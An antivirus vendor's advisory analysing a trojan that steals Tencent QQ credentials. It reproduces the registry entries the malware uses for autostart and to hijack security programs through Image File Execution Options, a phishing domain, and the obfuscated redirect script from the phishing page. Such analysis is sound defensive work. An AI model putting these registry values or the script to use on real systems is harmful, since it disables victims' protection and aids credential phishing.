Spyware/QQPass.20BB!pws

Overall Risk Rating: Medium	Distribution Potential: Low	Damage Potential: Low
In The Wild: Yes	Vulnerability: None	Discovered: 2008-12-19
Size: 46,428 bytes	Language: Chinese	Compression: None
Port(s): None	Payload: None

Aliases: Trojan.QQMess (Symantec) , TR/ATRAPS.Gen (Antivir) , Trojan-PSW.Win32.QQPass.egh (Kaspersky)
Affected Platforms: Windows XP, Windows 2003, Windows 2000

Upon execution, it hijacks some security related softwares, and take users to a fishing website.

Upon execution, it creates the following registry entries to enable itself to auto start when system reboot:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run]
"qq.exe"="{Path of the malware}"

It also creates the following registry entries to hijack these security related softwares:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe]
"Debugger"="C:\\WINDOWS\\system32\\svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe]
"Debugger"="C:\\WINDOWS\\system32\\svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe]
"Debugger"="C:\\WINDOWS\\system32\\svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DrRtp.exe]
"Debugger"="C:\\WINDOWS\\system32\\svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe]
"Debugger"="C:\\WINDOWS\\system32\\svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RStray.exe]
"Debugger"="C:\\WINDOWS\\system32\\svchost.exe"

In order to clean trojans that related with Tencent QQ, QQ embeds a dialogbox whose name is "QQ Doctor" in the QQ login dialogbox. After the trojan running, it hides this dislogbox, so the end user can't clean the trojans.

When the trojan found an end user logged in the QQ, it displays a fake Tencent Company's notify dialogbox, like the following :

When user click this dialogbox, it will take the user to the following phishing website :

http://www.08-qqq.cn

This website can record user's IP address, and one ip can access the website only once within a certain period. When an end user access this website, it respond a html page, like the following (It will be different every time you access it):

<html><body><script>function decoder(){var xlbb=new Array(88,181,199,210,70,205,152,26,75,42,193,125,150,68,28,243,245,161,149,
183,7,126,220,94,226,10,235,247,50,154,8,26,94,219);var syb=4;do{if(syb>32)break;xlbb[syb]=(((~((xlbb[syb]-xlbb[syb+1])&0xff))&0xff)+181)&0xff;syb++;}while(true);var syb=4;while(true){if(syb>30)break;xlbb[syb]=((((xlbb[syb]-xlbb[syb+1])&0xff)>>2)|((((xlbb[syb]-xlbb[syb+1])&0xff)<<6)&0xff))^xlbb[2];syb++;}for(var syb=2;;syb++){if(syb>29)break;xlbb[syb]=(-(((xlbb[syb]<<3)&0xff)|(xlbb[syb]>>5)))&0xff;}return String.fromCharCode(xlbb[3],xlbb[6],xlbb[7],xlbb[9],xlbb[14],xlbb[18],xlbb[21],xlbb[22],xlbb[25],xlbb[27],xlbb[28],xlbb[29],xlbb[30],xlbb[32]);}window.location="/?"+decoder();</script><br><br><center><h3>ʱҳҪ֧JavaScript</h3></center></body></html>

This webpage contains an obfuscated Java script. In fact, this Java script just generates a string, like the following :

"jdfwkey=lcx3v2"

and then navigates the following web page :

http://www.08-qqq.cn/?jdfwkey=lcx3v2

These web pages cannot be accessed at this time.

SEARCH VIRUS

THREATS STATUS

Orange: Internet threat activity is high. Some threats outbreak in local area.

MALWARE TOP

1 week

1 month

LATEST DEFINITIONS

Malware definition: 1042.72
Malicious sites: 1006.20
Application control: 1000.26